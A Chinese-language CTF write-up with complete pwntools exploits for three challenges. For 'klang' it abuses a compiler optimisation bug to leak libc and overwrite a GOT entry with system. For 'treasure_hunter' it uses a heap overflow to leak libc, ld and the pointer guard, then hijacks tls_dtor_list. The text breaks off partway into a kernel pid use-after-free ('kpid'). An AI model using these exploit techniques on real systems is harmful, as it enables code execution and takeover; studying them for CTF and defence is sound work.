0%

klang

1
2
3
4
5
6
klang: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=e64881fc54f3e0dfbb35631a6411af676c0f2d93, for GNU/Linux 3.2.0, with debug_info, not stripped
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,Partial RELRO,NX,PIE

题目的启动脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
def main():
if not check_token():
print("Invalid token.")
return 1

signal.alarm(600)
if not proof_of_work():
print("Invalid proof of work.")
return 1
signal.alarm(0)

writeline("Give me your code, ended by a line with 'END_OF_SNIPPET' (excluding quote).")
code = []
while True:
line = input()
if line == 'END_OF_SNIPPET':
break
code.append(line)

code = '\n'.join(code)
if len(code) > 1024:
print("Code too long.")
return 1

exe_path = compile(code)
if not exe_path:
print("Compilation failed.")
return 1

run_binary(exe_path)
return 0
  • 在编译完成以后还会执行该程序
1
2
3
4
5
6
7
8
9
10
def run_binary(exe_path):
os.chdir(WORKDIR)
os.chmod(exe_path, 0o755)

os.setgroups([])
os.setgid(GID)
os.setuid(UID)

commands = ["prlimit", "--as=67108864", "--cpu=30", "--nproc=5", "--", exe_path]
os.execvp("prlimit", commands)

漏洞分析

这是一个编译器,通过 klang/src/compiler/Semanticklang/src/compiler/SemanticParser 可以分析出该编译器的语法规则

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
ASTModule* ParseSource(const char* FileName) {
std::ifstream Input(FileName, std::ifstream::in);
if(!Input.is_open()) {
std::cerr << "Error: cannot open file " << FileName << std::endl;
return nullptr;
}

Scanner S(&Input); // 词法分析
Parser P(S); // 语法分析
if(P.parse() != 0) {
std::cerr << "Error: parsing failed" << std::endl;
return nullptr;
}
return GetModule();
}

cpp 的 flex 和 bison 要高级一些,其中完成了大多数的工作:

1
2
3
4
"int"       { return Parser::make_INT(location()); }
"array" { return Parser::make_ARRAY(location()); }
"string" { return Parser::make_STRINGK(location()); }
"void" { return Parser::make_VOID(location()); }
  • Parser::xx 是由 bison 自动生成,token 流的结构信息也由 bison 生成并管理
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
single_statement
: ID ASSIGN expression {
$$ = new ASTStatementAssign(new ASTExpressionVariable($1), $3, yylineno);
}
| ID LIDX expression RIDX ASSIGN expression {
$$ = new ASTStatementAssign(new ASTExpressionArrayAccess($1, $3), $6, yylineno);
}
| ID LBRAC expression_list RBRAC {
$$ = new ASTStatementFunctionCall(new ASTExpressionFunctionCall($1, $3), yylineno);
}
| IF LBRAC expression RBRAC block ELSE block {
$$ = new ASTStatementIfElse($3, $5, $7, yylineno);
}
| IF LBRAC expression RBRAC block {
$$ = new ASTStatementIf($3, $5, yylineno);
}
| DO block WHILE LBRAC expression RBRAC {
$$ = new ASTStatementWhile($5, $2, yylineno);
}
| RETURN expression {
$$ = new ASTStatementReturn($2, yylineno);
}
| RETURN {
$$ = new ASTStatementReturn(nullptr, yylineno);
}
;
  • 每个不同的 AST 节点其实对应了一个类(在 klang/src/compiler/Semantic/AST.h 中实现)

AST 的层次结构如下:

1
2
3
4
5
6
7
8
class ASTModule {
public:
......

private:
std::vector<ASTFunction*> Functions_;
std::map<ASTName, ASTFuncPrototype> ExternalFunctions_;
};
  • ASTModule:由函数和内置函数组成
1
2
3
4
5
6
7
8
9
10
11
12
class ASTFunction {
public:
......

private:
ASTName Name_;
ASTModule* Parent_;
ASTType ReturnType_;
std::vector<ASTParameter> Parameters_;
std::vector<ASTVarDef> Variables_;
std::vector<ASTStatement*> Statements_;
};
  • ASTFunction:包含参数,局部变量和若干语句
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
class ASTStatement {
public:
enum ASTStatementType : int {
ST_ASSIGN,
ST_IF,
ST_IFELSE,
ST_WHILE,
ST_RETURN,
ST_CALL,
};

......

private:
ASTFunction* Parent_;
ASTStatementType Type_;
int LineNo_;
};
  • ASTStatement:不同的语句都会继承 ASTStatement
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
class ASTExpression {
public:
enum ASTExpressionType : int {
EX_INTEGER,
EX_STRING,

EX_BINARY,

EX_FUNCTION_CALL,

EX_VARIABLE,
EX_ARRAY_ACCESS,
};

......

private:
ASTExpressionType Type_;
ASTStatement* Parent_;
};
  • ASTExpression:不同的语句都会继承 ASTExpression

语法分析最终会形成一个 AST,各个 AST 节点之间的层次关系支撑起了 AST 的结构,语义分析需要的数据信息也包含在各个 AST 节点中

该编译器提供了一些内置函数:

1
2
3
4
5
6
7
8
9
10
11
12
auto *Module = ParseSource(FileName);
if(!Module) {
return 1;
}

// external function defs
Module->AddExternalFunction("printi", std::make_pair(TY_VOID, std::vector<ASTType>{TY_INTEGER}));
Module->AddExternalFunction("prints", std::make_pair(TY_VOID, std::vector<ASTType>{TY_STRING}));
Module->AddExternalFunction("inputi", std::make_pair(TY_INTEGER, std::vector<ASTType>{}));
Module->AddExternalFunction("inputs", std::make_pair(TY_STRING, std::vector<ASTType>{}));
Module->AddExternalFunction("random", std::make_pair(TY_INTEGER, std::vector<ASTType>{}));
Module->AddExternalFunction("array_new", std::make_pair(TY_ARRAY, std::vector<ASTType>{TY_INTEGER}));
  • 可以分析出函数名,返回值和传参
1
2
3
using ASTType = int;
using ASTName = std::string;
using ASTFuncPrototype = std::pair<ASTType, std::vector<ASTType>>;
1
2
std::vector<ASTFunction*> Functions_;
std::map<ASTName, ASTFuncPrototype> ExternalFunctions_;
1
2
3
void AddExternalFunction(const char* Name, ASTFuncPrototype Prototype) {
ExternalFunctions_[Name] = Prototype;
}
  • AddExternalFunction 传入两个参数:“函数名” 和一个 pair 类型(用于记录函数返回值和传参)

在语义分析的过程中,会以 ASTFunction 为单位将 AST 节点转化为 IR 节点(在 klang/src/include/IR/IR.h 中实现):

1
2
3
4
5
6
7
8
9
std::pair<ModuleGenCtx, Module*> IRGen::Generate() {
Module* TheModule = new Module("<main>");
ModuleGenCtx Ctx(Module_);

for(auto *F : Module_->GetFunctions()) {
TheModule->AddFunction(GenerateFunction(Ctx, F));
}
return std::make_pair(Ctx, TheModule);
}
  • 先初始化根 IR 节点 TheModule,然后调用 GenerateFunction 将 AST 节点转化为 IR 节点
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
Function* IRGen::GenerateFunction(ModuleGenCtx& MCtx, ASTFunction* F) {
FuncBuilder* B = new FuncBuilder(F->GetName(), F->GetParameters().size());

FuncGenCtx Ctx(F, B, &MCtx);
Ctx.InitVariables();
GenerateBlock(Ctx, F->GetStatements());

// add initializers
auto *Entry = B->GetFunction()->Entry();
auto *Inst = Entry->Head();
for(auto &Var : F->GetVariables()) {
Entry->InsertBefore(new AssignInst(Ctx.GetVariable(Var.first), B->Imm(0)), Inst);
}
return B->GetFunction();
}

接着编译器会进行一些优化操作:

1
2
3
4
5
6
7
8
9
10
11
12
void OptimizeIR(Function* F) {
bool Changed;
do {
Changed = false;
Changed |= ConstantPropagate(F);
Changed |= CopyPropagate(F);
Changed |= LocalCSE(F);
Changed |= GlobalCSE(F);
Changed |= DeadCodeElimination(F);
} while(Changed);
return;
}

最后生成汇编代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
bool ModuleCodegen::Generate() {
ModuleSS_ << ".intel_syntax noprefix\n";

ModuleSS_ << ".text\n";
for(auto *F : (*Module_)) {
MachineFuncBuilder Builder(F);
Builder.Generate();
Builder.GetFunction()->Emit(ModuleSS_);
ModuleSS_ << '\n';
}

ModuleSS_ << ".data\n";
GenerateStringLiterals();
return true;
}

程序的漏洞点就发生在优化这一步

公共子表达式消除 CSE:如果一个表达式 e 已经计算过了,并且从先前的计算到现在 e 中所有变量的值都没有发生变化,那么 e 就成为公共子表达式:

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc(1));
return 0;
}

function leak_libc(int a) : int b-> int {
b := a + 1;
do{
}while( a + 1 < 10);
return b;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
mov rcx, qword ptr [rbp + 16]
add rcx, 0x1
mov r8, rcx
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, r8
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
xor r9, r9
cmp rcx, 0xa # 优化点
mov rax, 0x1
cmovl r9, rax
test r9, r9
jne _leak_libc_bb3
jmp _leak_libc_bb2
  • 这里的 a + 1 就是公共子表达式,已经被寄存器 RCX 代替

在正常情况下这种优化没有问题,但如果公共子表达式没有初始化,那么用于替代的寄存器就不会初始化:

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc());
return 0;
}

function leak_libc() : int a,int b-> int {
b := a + 1;
do{
}while( a + 1 < 10);
return b;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, 0x1
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
test rcx, rcx # 优化点
jne _leak_libc_bb3
jmp _leak_libc_bb2
  • 显然这里的 RCX 寄存器并没有初始化,并且 do-while 语句的部分代码也被优化掉了

入侵思路

利用 “公共子表达式消除” 的漏洞可以泄露未初始化的 RCX 寄存器(泄露 libc 地址):

1
2
3
4
5
6
7
8
9
10
11
function main() : -> int {
printi(leak_libc());
return 0;
}

function leak_libc() : int a-> int {
do{
if(a==1){};
}while(0);
return a==1;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
.global K_leak_libc
K_leak_libc:
_leak_libc_bb1:
push rbp
mov rbp, rsp
jmp _leak_libc_bb3
_leak_libc_bb2:
mov rax, r8
mov rsp, rbp
pop rbp
ret
_leak_libc_bb3:
test rcx, rcx
mov r8, rcx
jne _leak_libc_bb5
jmp _leak_libc_bb4
_leak_libc_bb4:
jmp _leak_libc_bb2
_leak_libc_bb5:
jmp _leak_libc_bb4
  • 没有被初始化的 RCX 寄存器将会被函数返回

我们可以拷贝题目 docker 容器中,目录 /workdir 下的二进制文件,然后用 GDB 进行调试:

1
2
3
RAX  0x7ffff7e9bd9b (alarm+11) ◂— cmp    rax, -0xfff
RBX 0x4016b0 (__libc_csu_init) ◂— endbr64
RCX 0x7ffff7e9bd9b (alarm+11) ◂— cmp rax, -0xfff
1
2
3
4
  0x40121e <_leak_libc_bb2>      mov    rax, r8
0x401221 <_leak_libc_bb2+3> mov rsp, rbp
0x401224 <_leak_libc_bb2+6> pop rbp
0x401225 <_leak_libc_bb2+7> ret <0x4011ff; K_main+9>
  • 成功泄露出 libc 基地址

程序还有另一处漏洞:

1
2
3
4
5
6
7
8
9
10
11
12
function wr64() : int v,string s -> void {
v := inputi();
s := inputs();
_wr64(s,v);
return;
}

function _wr64(string x,int b) : array t -> void {
t[0] := b;
t := array_new(1);
return;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
.global K__wr64
K__wr64:
__wr64_bb1:
push rbp
mov rbp, rsp
sub rsp, 0x8
push qword ptr [rbp + 24] # 第3个参数
push 0x0 # 第2个参数
push rcx # 第1个参数
mov qword ptr [rbp - 8], rcx
call K_array_store
mov rcx, qword ptr [rbp - 8]
add rsp, 0x18
push 0x1
mov qword ptr [rbp - 8], rcx
call K_array_new
mov rcx, qword ptr [rbp - 8]
mov r8, rax
add rsp, 0x8
mov rcx, r8
mov rsp, rbp
pop rbp
ret
  • 按照正常的语法,对于 array 应该先调用 array_new 开辟内存空间,然后才能调用 array_store 存储数据
  • 但事实上 array_store 可以利用遗留在寄存器上的地址作为内存空间
  • 其第一个参数 RCX 没有初始化,可以是上一个函数遗留的值
1
2
3
4
5
6
7
8
9
void do_array_store(struct array_t* arr, int64_t index, int64_t value) {
if(!arr) {
fatal("Array is null");
}
if(index < 0 || index >= arr->size) {
fatal("Array index out of bounds");
}
arr->data[index] = value;
}

接下来的入侵思路就比较清晰了:

  • 先往 inputi 中写入 system_addr
  • 再往 inputs 中写入 puts_got
  • 然后寄存器 RCX 会由于没有初始化而存储有 puts_got 的地址
  • 正常调用 do_array_store,就会往 puts_got 中写入 system_addr
1
2
p.sendline(str(system_addr))
p.sendline(p64(0x404018))

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
function main() : -> int {
printi(leak_libc());
wr64();
prints("cat /flag");
return 0;
}

function leak_libc() : int a-> int {
do{
if(a==1){};
}while(0);
return a==1;
}

function wr64() : int v,string s -> void {
v := inputi();
s := inputs();
_wr64(s,v);
return;
}

function _wr64(string x,int b) : array t -> void {
t[0] := b;
t := array_new(1);
return;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
from pwn import *
context.log_level='DEBUG'

libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

local = 0
if local:
p=process("./exp.exe")
else:
p=remote("127.0.0.1",9999)
p.sendlineafter(b'END_OF_SNIPPET',open("./exp.klang").read())
p.sendline("END_OF_SNIPPET")
p.recvuntil("(excluding quote).\n")

def debug():
gdb.attach(p,"b* 0x40127b\n")
#gdb.attach(p,"b *$rebase(0x1409)\nb *$rebase(0x137A)\n")
pause()

#debug()

leak_addr = eval(p.recvuntil("\n"))
libc_base = leak_addr - 0xe2d9b
success("leak_addr >> "+hex(leak_addr))
success("libc_base >> "+hex(libc_base))

system_addr = libc_base + libc.symbols['system']
success("system_addr >> "+hex(system_addr))

p.sendline(str(system_addr))
p.sendline(p64(0x404018))

p.interactive()

treasure_hunter

1
GNU C Library (Ubuntu GLIBC 2.35-0ubuntu3.6) stable release version 2.35.
1
2
3
4
5
6
treasure_hunter: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=31386191e745f7d03c572b792bd501c102ba33f3, for GNU/Linux 3.2.0, not stripped
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
  • 64位,dynamically,全开
1
2
3
4
5
6
7
8
You are a treasure hunter hoping to dig out as much gold as you can.
Today, you go to a desert, where as said buried many gold coins.
For more convenience, people divided this desert into pieces, each piece labelled with a number(0 to 0xFFF).
As there is limited water, you cannot dig for a long time.
Every day, you can only dig or detect one piece of this desert.
If you choose to dig, you can find all the coins in this piece (if there exists any), but in a risk of quicksand.
If you choose to detect, you can find out whether this piece is safe to dig, avoiding losing your life.
To start your exploration, I draw an incomplete map of this desert which contains danger info of some pieces.

漏洞分析

堆溢出漏洞:

1
2
3
page = malloc(size);
printf("Content: ");
len = read(0, page, size + 10);

入侵思路

题目有两处可能可以利用的打印:

1
2
if ( random_list[site] )
printf("Congratulations! we discovered %d gold coin(s)!\n", (unsigned __int8)random_list[site]);
  • 打印位于堆(mmap)上的随机数
1
2
3
4
printf(
"\x1B[1;31mHello, my boy! I'm your god. I'll give you a mysterious number, if you know how to use this number, Yo"
"u can then get a thing called flag: %p\x1B[0m",
hashmap);
  • 打印位于 BSS 的堆地址

通过伪造 hash 可以使 site 特别大,从而在 random_list 上造成溢出

下面是提取出的 hash 逻辑:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
#include <stdio.h>
#include <string.h>
#include <openssl/sha.h>

int main() {
SHA256_CTX sha256;
size_t hash_buffer;
char hash_str[SHA256_DIGEST_LENGTH];
size_t hash_result;
size_t hash_result1;
size_t hash_result2;

hash_buffer = 0x7ffff7419ce0;
SHA256_Init(&sha256);
SHA256_Update(&sha256, (void *) &hash_buffer, 8);
SHA256_Final(&hash_str, &sha256);

hash_result = *(size_t*)&hash_str[0];
printf("%lx\n", hash_result);
hash_result1 = (hash_result >> 4) % 0x100000000;
printf("%lx\n", hash_result1);
hash_result2 = hash_result >> 57;
printf("%lx\n", hash_result2);

return hash_result2;
}

转化为 python 脚本:

1
2
3
4
5
6
7
8
9
10
def hash(input):
pack = struct.pack('<q', input) # 这里hash的是二进制数据
sha256 = hashlib.sha256()
sha256.update(pack)
hash_bytes = sha256.digest()
hash_int, = struct.unpack('<q', hash_bytes[:8])
output = hash_int >> 0x39
if output < 0:
output = 0x80 + output
return output

泄露样例如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
site = [228,1368,3783,3182,3625,3347,349,1557,798,2864,1766,3149,2107,3684,601,1260,235]
one_gadget = [0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]

for i in range(len(site)):
sla("captain?",str(site[i]))
ru("discovered ")
gold = eval(ru(" "))
sla("some?","g")
sla("get?",str(gold))
sla("Content length:",str(0x8))
payload = b"a"
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","n")

sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)

sa("Buy?","y")
ru("flag: ")
leak_addr = eval(ru("\x1B[1;31mI")[:-4])
heap_base = leak_addr - 0x122c0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

sla("write:",str(0))
sa("Write:",str(0))
sa("captain?","n")

target = 0x3018+3
sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_3 = eval(ru(" "))
success("part_3 >> "+hex(part_3))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+4
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_4 = eval(ru(" "))
success("part_4 >> "+hex(part_4))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+8+2
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_2 = eval(ru(" "))
success("part_2 >> "+hex(part_2))
sla("some?","g")
sla("get?",str(0))

target = 0x3018+8+1
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target) + p64(0x1))*0x3f
payload += p64(heap_base+0x11ec0)+p64(heap_base+0x11ec0+0x200)+p64(heap_base+0x11ec0+0x200)
payload += p64(0x21)+p16((heap_base+0x122a0)%0x10000)
sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash.hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
part_1 = eval(ru(" "))
success("part_1 >> "+hex(part_1))
sla("some?","g")
sla("get?",str(0))

libc_addr = (part_1<<8)+(part_2<<16)+(part_3<<24)+(part_4<<32)+(0x7f<<40)
libc_base = libc_addr - 0x174900
success("libc_addr >> "+hex(libc_addr))
success("libc_base >> "+hex(libc_base))

接下来只能尝试劫持 tls_dtor_list_addr,但在此之前需要先泄露位于 tls 上的 key 值(全局变量名称为 __pointer_chk_guard_local

由于题目本身的限制,不能直接泄露 tls 上的 key 值,只能从其他地方泄露 key 值,全局搜索 key 值可以找到如下的地址:

1
2
3
4
5
pwndbg> search -t qword 0xfcbb79539c458355
Searching for value: b'U\x83E\x9cSy\xbb\xfc'
[anon_7fb6bbc70] 0x7fb6bbc70770 0xfcbb79539c458355
ld-linux-x86-64.so.2 0x7fb6bbce2ab0 0xfcbb79539c458355
[stack] 0x7ffc0c96a481 0xfcbb79539c458355
  • PS:该地址位于 ld 上,需要先泄露 ld 的基地址(由于 cpp 的影响,偏移不唯一但命中概率挺高的)

泄露 key 值后,尝试劫持 tls_dtor_list_addr(fs_base-0x78) 即可

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
# -*- coding:utf-8 -*-
from pwn import *
import hashlib
import struct

arch = 64
challenge = './treasure_hunter'

context.os='linux'
#context.log_level = 'debug'
if arch==64:
context.arch='amd64'
if arch==32:
context.arch='i386'

elf = ELF(challenge)
libc = ELF('libc.so.6')

rl = lambda a=False : p.recvline(a)
ru = lambda a,b=True : p.recvuntil(a,b)
rn = lambda x : p.recvn(x)
sn = lambda x : p.send(x)
sl = lambda x : p.sendline(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
irt = lambda : p.interactive()
dbg = lambda text=None : gdb.attach(p, text)
# lg = lambda s,addr : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s,addr))
lg = lambda s : log.info('33[1;31;40m %s --> 0x%x 33[0m' % (s, eval(s)))
uu32 = lambda data : u32(data.ljust(4, b'x00'))
uu64 = lambda data : u64(data.ljust(8, b'x00'))

b = "set debug-file-directory ./.debug/\n"
#b += "b *$rebase(0x2D3B)\n"

local = 1
if local:
p = process(challenge)
#p = gdb.debug(challenge, b)
else:
p = remote('1.95.4.251','31778')

def debug():
gdb.attach(p,"")
#gdb.attach(p,"b *$rebase()\n")
#pause()

def cmd(op):
sla(">",str(op))

#hash = cdll.LoadLibrary('./hash.so')

#debug()

site = [228,1368,3783,3182,3625,3347,349,1557,798,2864,1766,3149,2107,3684,601,1260,235]
one_gadget = [0x50a47,0xebc81,0xebc85,0xebc88,0xebce2,0xebd3f,0xebd43]

for i in range(len(site)):
sla("captain?",str(site[i]))
ru("discovered ")
gold = eval(ru(" "))
sla("some?","g")
sla("get?",str(gold))
sla("Content length:",str(0x8))
payload = b"a"
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","n")

def hash(input):
pack = struct.pack('<q', input)
sha256 = hashlib.sha256()
sha256.update(pack)
hash_bytes = sha256.digest()
hash_int, = struct.unpack('<q', hash_bytes[:8])
output = hash_int >> 0x39
if output < 0:
output = 0x80 + output
return output

sla("captain?",str(site[0]))
sla("some?","g")
sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)

sa("Buy?","y")
ru("flag: ")
leak_addr = eval(ru("\x1B[1;31mI")[:-4])
heap_base = leak_addr - 0x122c0
success("leak_addr >> "+hex(leak_addr))
success("heap_base >> "+hex(heap_base))

sla("write:",str(0))
sa("Write:",str(0))
sa("captain?","n")
sla("captain?",str(site[0]))
sla("some?","g")

parts = [0,0,0,0,0,0,0,0]

def rotate_left(value,left):
re = (value << left) | (value >> (8 * 8 - left))
return re & 0xffffffffffffffff


def read(input,n):
global parts
map_start = heap_base+0x11ec0
map_end = map_start + 0x1000
map_metadata = heap_base+0x122a0

for i in range(n):
target = input+i
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target,sign=True) + p64(0x1))*0x3f
payload += p64(map_start) + p64(map_end) + p64(map_end)
payload += p64(0x21) + p16((map_metadata)%0x10000)

sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash(target)))
sa("captain?","n")
sla("captain?",str(target))
ru("discovered ")
parts[i] = eval(ru(" "))
success("input:%lx => parts[%d]=%lx",input,i,parts[i])
sla("some?","n")

def write(input,addr,n):
map_start = heap_base+0x11ec0
map_end = map_start + 0x1000
map_metadata = heap_base+0x122a0

for i in range(n):
target = input+i
sla("Content length:",str(0x408))
payload = b""
payload += (p64(target,sign=True) + p64(0x1))*0x3f
payload += p64(map_start) + p64(map_end) + p64(map_end)
payload += p64(0x21) + p16((map_metadata)%0x10000)

sa("Content:",payload)
sa("Buy?","y")
sla("write:",str(0))
sa("Write:",p8(hash(target)))
sa("captain?","n")
sla("captain?",str(target))
sla("some?","b")
sla("bury?",str((addr >> (i*8)) & 0xff))


read(0x2a58,6)
libc_addr = (parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)
libc_base = libc_addr - 0xa5700
success("libc_addr >> "+hex(libc_addr))
success("libc_base >> "+hex(libc_base))

sla("Content length:",str(0x8))
payload = b"a"*0x8
sla("Content:",payload)
sa("Buy?","n")

sa("captain?","n")
sla("captain?",str(0x2a58+5))
sla("some?","n")

read(0x2ab0,8)
key = (parts[0])+(parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)+(parts[6]<<48)+(parts[7]<<56)
success("key >> "+hex(key))

read(0x3b48,6)
ld_addr = (parts[1]<<8)+(parts[2]<<16)+(parts[3]<<24)+(parts[4]<<32)+(parts[5]<<40)
ld_base = ld_addr - 0x39e00
success("ld_addr >> "+hex(ld_addr))
success("ld_base >> "+hex(ld_base))

fs_base = ld_base - 0x11f8c0
mmap_addr = ld_base + 0x37000
tls_dtor_list_addr = fs_base - 0x78
system_libc = libc_base + libc.sym["system"]
success("fs_base >> "+hex(fs_base))
success("tls_dtor_list_addr >> "+hex(tls_dtor_list_addr))
success("mmap_addr >> "+hex(mmap_addr))
success("system_libc >> "+hex(system_libc))

write(tls_dtor_list_addr-mmap_addr,heap_base+0x128f0,6)

sla("Content length:",str(0x20))
payload = b"a"*0x10+p64(rotate_left(system_libc^key,0x11))+p64(libc_base+0x1d8678)
sa("Content:",payload)
sa("Buy?","n")
sa("captain?","y")

p.interactive()

kpid

1
Linux version 6.1.75 (hyh@uu22) (Ubuntu clang version 17.0.6 (++20231209124227+6009708b4367-1~exp1~20231209124336.77), GNU ld (GNU Binutils for Ubuntu) 2.38) #2 SMP PREEMPT_DYNAMIC
1
2
3
4
5
6
7
8
9
10
11
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-cpu qemu64,+smep,+smap,+rdrand \
-m 512M \
-smp 2 \
-initrd rootfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic_on_warn=1 panic=-1 pti=on page_alloc.shuffle=1 kaslr" \
-monitor /dev/null \
-nographic \
-no-reboot
  • smep,smap,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#!/bin/sh
chown -R root:root /
chmod 400 /flag.txt
chmod -R 755 /dev
chmod -R 777 /tmp

mount -t proc none /proc
mount -t sysfs none /sys
mount -t tmpfs none /tmp
mount -t devtmpfs none /dev

exec 0</dev/console
exec 1>/dev/console
exec 2>/dev/console
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

chown -R ctf:ctf /home/ctf
insmod /kpid.ko
chmod 666 /dev/kpid
chmod 666 /dev/dma_heap/system

echo -e "Boot took $(cut -d' ' -f1 /proc/uptime) seconds"
cd /home/ctf
setsid /bin/cttyhack setuidgid ctf /bin/sh

umount /proc
umount /sys
poweroff -d 0 -f

漏洞分析

1
2
3
4
memset(buf.field_28, 0, sizeof(buf.field_28));
memset(&buf, 0, 0x20);
nr = kernel_clone(&buf);
pid = find_vpid((unsigned int)nr);
  • 内核模块会调用 kernel_clone,可以将这个功能当成一个 fork

漏洞点是 pid UAF:

1
2
3
4
5
6
7
if ( dest_cnt )
{
--dest_cnt;
put_pid(pid);
return 0LL;
}
return 0xFFFFFFFFFFFFFFEALL;
  • 释放了 pid 却没有释放该进程,导致后续可以通过该进程对 UAF slab 进行修改

题目给出提示:Dirty Pagetable

在 x86-64 Linux 中,通常使用 4 级页表将虚拟地址转换为物理地址

  • Dirty Pagetable 以 PTE(页表条目)为目标,这是物理内存之前的最后一个级别
  • 在 Linux 中,当需要新的 PTE 时,PTE 的页面也会使用 Buddy 系统进行分配

受害 pid 对象的计数字段与有效的 PTE 重合

1
2
3
4
5
6
7
8
9
10
11
12
13
struct pid
{
refcount_t count; /* 指向该数据结构的引用次数 */
unsigned int level;
